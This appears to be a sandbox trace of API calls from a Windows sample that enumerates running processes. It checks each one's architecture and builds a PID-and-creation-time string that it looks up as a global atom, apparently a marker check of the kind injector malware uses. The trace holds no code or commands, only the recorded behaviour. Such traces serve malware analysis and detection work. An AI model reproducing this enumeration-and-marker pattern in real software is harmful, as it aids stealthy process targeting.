	[0096.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658f68, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.352] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.352] CloseHandle (hObject=0x248) returned 1
	[0096.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.353] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.353] CloseHandle (hObject=0x248) returned 1
	[0096.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.353] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.353] CloseHandle (hObject=0x248) returned 1
	[0096.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.353] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.353] CloseHandle (hObject=0x248) returned 1
	[0096.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.354] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.354] CloseHandle (hObject=0x248) returned 1
	[0096.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.354] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.354] CloseHandle (hObject=0x248) returned 1
	[0096.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.354] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.354] CloseHandle (hObject=0x248) returned 1
	[0096.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ad08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.355] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.355] CloseHandle (hObject=0x248) returned 1
	[0096.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.355] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.355] CloseHandle (hObject=0x248) returned 1
	[0096.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658998, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.355] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.355] CloseHandle (hObject=0x248) returned 1
	[0096.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.356] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.356] CloseHandle (hObject=0x248) returned 1
	[0096.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.356] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.356] CloseHandle (hObject=0x248) returned 1
	[0096.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.356] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.356] CloseHandle (hObject=0x248) returned 1
	[0096.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658d48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.357] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.357] CloseHandle (hObject=0x248) returned 1
	[0096.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658d88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.357] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.357] CloseHandle (hObject=0x248) returned 1
	[0096.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.357] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.357] CloseHandle (hObject=0x248) returned 1
	[0096.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.358] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.358] CloseHandle (hObject=0x248) returned 1
	[0096.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.358] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.358] CloseHandle (hObject=0x248) returned 1
	[0096.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.358] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.358] CloseHandle (hObject=0x248) returned 1
	[0096.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.359] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.359] CloseHandle (hObject=0x248) returned 1
	[0096.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x6590e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.359] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.359] CloseHandle (hObject=0x248) returned 1
	[0096.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.359] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.359] CloseHandle (hObject=0x248) returned 1
	[0096.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658ea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.359] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.359] CloseHandle (hObject=0x248) returned 1
	[0096.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c90, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.360] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.360] CloseHandle (hObject=0x248) returned 1
	[0096.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658a60, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.360] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.360] CloseHandle (hObject=0x248) returned 1
	[0096.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.360] GetLastError () returned 0x5
	[0096.360] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.361] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.362] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.362] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] GetLastError () returned 0x5
	[0096.362] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.363] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetLastError () returned 0x5
	[0096.364] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.364] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.364] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.365] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.365] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.365] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.365] CloseHandle (hObject=0x248) returned 1
	[0096.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.365] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.365] CloseHandle (hObject=0x248) returned 1
	[0096.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.366] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.366] CloseHandle (hObject=0x248) returned 1
	[0096.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16638) returned 0xc0000004
	[0096.406] VirtualAlloc (lpAddress=0x0, dwSize=0x16738, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16738, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
